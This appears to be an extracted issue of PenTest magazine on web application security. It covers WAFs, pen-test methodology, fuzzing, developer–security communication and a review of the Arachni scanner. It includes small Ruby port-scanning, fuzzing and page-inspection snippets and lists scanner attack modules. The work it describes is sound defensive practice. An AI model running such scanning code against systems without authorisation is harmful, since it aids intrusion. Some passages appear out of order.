Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to counter Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks with which attackers seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured accordingly; penetration tests help with the correct configuration.

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
Demands on Penetration Testers
When penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for a safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd.
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it's possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:
• Automation process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used
Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through the following tests: Cross-Site Scripting, Injection Flaws and Buffer Overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application tools include: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can manipulate the logic of the application to perform tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows manual pen testing to subvert the business logic where security vulnerabilities can be exposed. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation at point B.
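The point A to point C example above can be made concrete with a tiny server-side state machine that refuses to let a session skip the validation step; the representation is invented purely for illustration:

```python
# Tiny state machine for the A -> B -> C workflow: step B (the security
# validation) must be completed before step C becomes reachable.
ORDER = ["A", "B", "C"]

def next_allowed(completed):
    """Return the only step a session may enter next, or None when finished."""
    return ORDER[len(completed)] if len(completed) < len(ORDER) else None

session = []                  # steps this session has completed, in order
print(next_allowed(session))  # a new session must start at A
session.append("A")
print(next_allowed(session))  # B is forced next; a request for C is refused
session.append("B")
print(next_allowed(session))  # only now is C reachable
```

An application that checks each incoming request against `next_allowed` server-side cannot be driven straight from A to C, no matter what URL the attacker requests; applications that rely on the client following links in order are exactly the ones the manual review uncovers.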
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It has also been proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing the most likely exploitable vulnerabilities and allowing similar instances of vulnerabilities to be found throughout the code.

Figure 1. The different activities of the pen testing process
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where the access to the resources under test is remote, over the Internet, using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Testing processes used to achieve the security vulnerability assessment include Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment. Some of these approaches are:

• Zero-Knowledge Test (Black Box) – In this approach the application security testing team will not have any inside information about the target environment; the expected knowledge is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial-Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under testing is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial-of-service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be achieved through two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types of testing can be conducted with least information (black box) and also with full information (white box).
Figure 2. The different phases of pen testing
WEB APP SECURITY
Page 16–17, http://pentestmag.com, 01/2011 (1) November
Figure 3 shows different procedures and steps that can be used to conduct the penetration testing. The following is a description of these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning under the defined scope of the project is conducted: automated scanners examine the open ports and scan the system to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step, the testers prioritize the systems and decide which attack methods will be used, based on the type of each system and how critical it is. Also in this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using the automated tools is conducted: the attack methods designed in the previous phase are used to carry out the following tests: data and service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings should also be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Applications Testing Tools

Throughout the pen test, a specific, structured methodology has to be followed, with steps such as Enumeration, Vulnerabilities Assessment and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
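Manual inspection of this kind is easy to script. The Ruby sketch below fetches a page, dumps its response headers and extracts hidden form fields; the target URL and the regex-based extraction are illustrative only, and a real assessment would use a proper HTML parser.

```ruby
require "net/http"
require "uri"

# Pull hidden form fields out of raw HTML. A quick regex-based check for
# illustration only; a proper parser (e.g. Nokogiri) handles edge cases.
def hidden_fields(html)
  html.scan(/<input[^>]*type=["']hidden["'][^>]*>/i).map do |tag|
    [tag[/name=["']([^"']+)["']/i, 1], tag[/value=["']([^"']*)["']/i, 1]]
  end.to_h
end

# Fetch a page and dump its response headers (Server, X-Powered-By and
# friends often leak version information), then return any hidden fields.
def inspect_page(url)
  res = Net::HTTP.get_response(URI(url))
  res.each_header { |name, value| puts "#{name}: #{value}" }
  hidden_fields(res.body)
end

# The URL below is a placeholder, not a real test target.
p inspect_page("http://example.com/login") if __FILE__ == $0
```

Tampering with the values returned by `hidden_fields` and resubmitting the form is exactly the kind of manual check automated scanners tend to miss.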
Some of the areas that can be covered during the vulnerabilities assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques, procedures and steps
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause denial of service conditions; these are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerabilities assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. At this point the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing
Port Scanners

Such tools are used to gather information about which network services are available for connection on each target host. The port scanning tools usually examine or question each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility of port scanners allows examining different port configurations as well as hiding from network intrusion detection mechanisms.
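The basic connect-scan idea behind these tools fits in a few lines of Ruby. This is a deliberately minimal sketch: real scanners such as nmap add SYN and UDP scanning, timing evasion and OS fingerprinting, none of which is shown here, and the host/port choices are up to the tester.

```ruby
require "socket"
require "timeout"

# Minimal TCP connect() scanner: report which of the given ports accept a
# connection within a short timeout. Closed or filtered ports raise an
# error or time out and are simply skipped.
def open_ports(host, ports, timeout_s = 0.5)
  ports.select do |port|
    Timeout.timeout(timeout_s) { TCPSocket.new(host, port).close; true }
  rescue StandardError
    false
  end
end

# Example invocation (host and range are arbitrary):
#   open_ports("127.0.0.1", (1..1024).to_a)
```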
Vulnerability Scanners

While port scanners only produce an inventory of the types of available services, vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard and Core Impact.
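The database-driven matching such scanners perform can be sketched in a few lines of Ruby. The banner patterns and version thresholds below are invented for illustration and are not taken from any real scanner's database.

```ruby
# Map service-banner patterns to rules that decide whether the advertised
# version is known to be defective. Entries here are made up for the example;
# real scanners ship databases of thousands of such checks.
KNOWN_DEFECTS = {
  /Apache\/2\.2\.(\d+)/ => ->(m) { m[1].to_i < 15 && "outdated Apache 2.2.x" },
  /OpenSSH_4\./         => ->(_) { "end-of-life OpenSSH 4.x" }
}.freeze

# Return the list of findings for a single service banner.
def check_banner(banner)
  KNOWN_DEFECTS.filter_map do |pattern, rule|
    (m = pattern.match(banner)) && rule.call(m)
  end
end
```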
Application Scanners

Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy

Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and those of its associated components. For example, the penetration testers can view all cookies, hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application.
The penetration testing practice described above is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used for feedback and reporting of the test results.
• Extensibility – The tool should be customizable, and it must provide scripting-language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that can be configured is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, giving a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular IP range or license limits, is a better tool than others.
Security Techniques for Web Apps

Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from a user web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for the web application's users and to protect stored passwords.
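The first two guidelines can be sketched with Ruby's standard library alone. The function names, the whitelist pattern and the session-binding scheme below are illustrative choices, not a prescribed design; frameworks such as Rails handle both concerns in their built-in helpers.

```ruby
require "cgi"
require "openssl"
require "securerandom"

# -- Sanitizing browser data: validate against a whitelist on input and
#    escape on output, rather than trying to blacklist known attacks.
def valid_username?(input)
  !!(input =~ /\A[a-zA-Z0-9_]{3,20}\z/)
end

def render_comment(text)
  "<p>#{CGI.escapeHTML(text)}</p>"   # <script> payloads become inert text
end

# -- CSRF protection: bind a token to the session, embed it in a hidden
#    field when serving the form, and recompute it on submission.
APP_SECRET = SecureRandom.hex(32)   # kept server-side, per application

def csrf_token(session_id)
  OpenSSL::HMAC.hexdigest("SHA256", APP_SECRET, session_id)
end

def valid_submission?(session_id, submitted_token)
  # Constant-time comparison avoids leaking information via timing.
  OpenSSL.secure_compare(csrf_token(session_id), submitted_token)
end
```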
Conclusion

A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system; such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerabilities assessment plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue over time to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment automated testing, in particular for the logical vulnerabilities that automated tools cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than manual testing of these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN

Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor degree in Engineering, a Bachelor degree in Computer Science and a Master degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?

Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases

When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation

All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING

Not maintaining proprietary test scripts

Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box

If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software.
Using hardware test beds

Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for cloud

A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups.
PROPERTIES OF A GOOD FUZZING TOOL

There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer; what are the qualities that a fuzzing tool should have?
Model-based test suites

Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use

Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated

Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage

Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable

Time is almost always an issue when it comes to testing. In QA you rarely have much time for testing and therefore need to run tests fast; sometimes you can use more time and select other test completion criteria. The user must also have control over fuzzing parameters such as test coverage.
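The gap between quick and dirty fuzzing and a real tool is easiest to see in code. The Ruby sketch below is deliberately the naive kind the article warns about: it mutates a valid seed input at random, with no protocol model, no coverage metric and no anomaly documentation; the seed input and mutation count are arbitrary choices.

```ruby
# Mutation fuzzing in its simplest form: flip a few random bytes of a
# known-good sample to produce anomalous test cases.
def mutate(seed, mutations: 3, rng: Random.new)
  bytes = seed.bytes
  mutations.times { bytes[rng.rand(bytes.size)] = rng.rand(256) }
  bytes.pack("C*")
end

# Generate a batch of cases. A fixed RNG seed makes every run reproducible,
# which matters for the remediation requirement discussed earlier.
def fuzz_cases(seed, count, rng: Random.new(1234))
  Array.new(count) { mutate(seed, rng: rng) }
end
```

A model-based fuzzer would instead derive cases from a specification of the protocol, targeting length fields, delimiters and state transitions rather than arbitrary bytes.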
Application Security members are often considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get
an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers something like Give us the latest Web 2.0 Social-enabled website, or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this online, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom; for example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filtering policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.

There is a third approach, which I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement you produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.
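As a small taste of that test-first idea, here is a dependency-free Ruby sketch. RSpec and Cucumber would normally be used; plain assertions stand in for them here, and the script-stripping filter is a toy for illustration, not production-grade sanitization. The expectations are agreed on first, and the filter is written until they all pass.

```ruby
# The executable "spec": examples of malformed input paired with the
# behaviour the security team expects. In RSpec these would be
# expect(...) blocks inside describe/it groups.
EXAMPLES = {
  "<script>alert(1)</script>hi"     => "alert(1)hi",
  "<SCRIPT src='evil.js'></SCRIPT>" => "",
  "plain text"                      => "plain text"
}.freeze

# The code under test, written by developers until every example passes.
# (A toy filter: real sanitization needs far more than stripping one tag.)
def filter_input(value)
  value.gsub(%r{</?script[^>]*>}i, "")
end

EXAMPLES.each do |input, expected|
  raise "spec failed for #{input.inspect}" unless filter_input(input) == expected
end
puts "all specs pass"
```

The point is the workflow, not the filter: the spec is the shared language between the security team and the developers.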
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process and use a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report

Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific enough information to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap

What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Create a development framework that has security built into it
• Design an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers,
PAOLO PEREGO

Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing the Tae kwon-do ITF martial art. He's a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood

According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details
Pulling the Legs of Arachni

Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
